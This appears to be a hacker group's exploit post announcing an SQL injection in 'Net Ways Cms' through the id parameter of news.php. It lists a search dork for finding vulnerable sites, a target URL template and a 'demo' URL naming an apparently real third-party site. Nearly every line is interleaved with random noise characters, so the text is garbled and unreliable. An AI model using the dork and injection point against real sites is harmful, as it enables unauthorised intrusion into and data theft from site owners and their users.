################################################################################??######## 2 ^# t2 r7 C9 s& |# U6 o6 Z, S
# / n+ ` E. x! u* {( F$ a
# Exploit Title : Net Ways Cms Sql Injection Vulnerability + Q" b2 S1 @5 u6 f% W2 j8 A
# % ~! m1 @* h: E6 D% ?" A& v d
# Author : IrIsT.Ir
5 [! s* K: W% d8 {8 X; `% {0 M#
( v! h, |# h8 N1 B3 K" Q# Discovered By : Am!r ! ~" Q0 J, @, a) L# q
#
& }- C% Y# G W' ^9 \- W7 K# Home : http://IrIsT.Ir/forum ; }" f) g. G8 F# `/ V
# ) p2 |/ h; P9 k5 ~
# Software Link : http://www.netways.com/ www.political-security.com; Z i- S6 [$ `! e! v
#
: u$ c9 y( \" S. z: ^9 d# Security Risk : High
?) K p* ]$ F- I# K6 a#
! w8 A: ~3 `9 P: }# Version : All Version 7 v4 z5 z' k7 o5 V/ {
#
- e; u( C @, F( m8 ^. S4 n# Tested on : GNU/Linux Ubuntu - Windows Server - win7
0 b1 ~+ R* G K& Y8 @2 q s# 1 q, X4 S. u7 Z: A+ P
# Dork : intext:"Designed & developed by NetWays" * W9 p" H( \( J0 Z
# . h4 R8 t3 M# }; f
################################################################################??######## $ O; L& K( }/ ^# x1 ~
# . A! R3 D" v& W- e" {
# Expl0iTs :
1 r9 `8 o+ P L: s# ) w- p! [7 w) v; Q, b
# http://target.com/news.php?id=[Sql] 4 ?2 q: @' p D& \, V& a
#
4 Z* y) L6 c1 F9 G' B# + J. g* E/ o3 a: _, i6 a
# D3mo : 6 S t/ I" i( G5 }0 Q
# 5 B4 w' w: u0 @! _1 p% _
# http://compagnieparento.com/news.php?id=7[Sql] 6 h% J) Y# T* O7 T
# 8 W: n$ Z( }, I. \$ l8 @6 V9 m
################################################################################??########
/ |5 ~8 K+ d4 K2 z! O#
" D: T6 m/ m& h e* q- O, M! Z$ s# Greats : B3HZ4D - nimaarek - Dead.Zone - C0dex - SpooferNinja - TaK.FaNaR - Nafsh - BestC0d3r
, z) m$ E i) J2 x6 U# , P" g0 d( D0 D! k& d4 }& W
# 0x0ptim0us - TaK.FaNaR - m3hdi - F@rid - Siamak.Black - H4x0r - dr.tofan - skote_vahshat - d3c0d3r
8 ]: T9 \; q# E) _# ) w @. E" V# W! G* V
# Mr.Xpr & M.R.S.CO & Mr.Cicili & H-SK33PY & All Members In Www.IrIsT.Ir/forum
8 Q* N7 @" P2 A" r% B# p#
6 u2 ^. g, m c! e# f################################################################################??######## |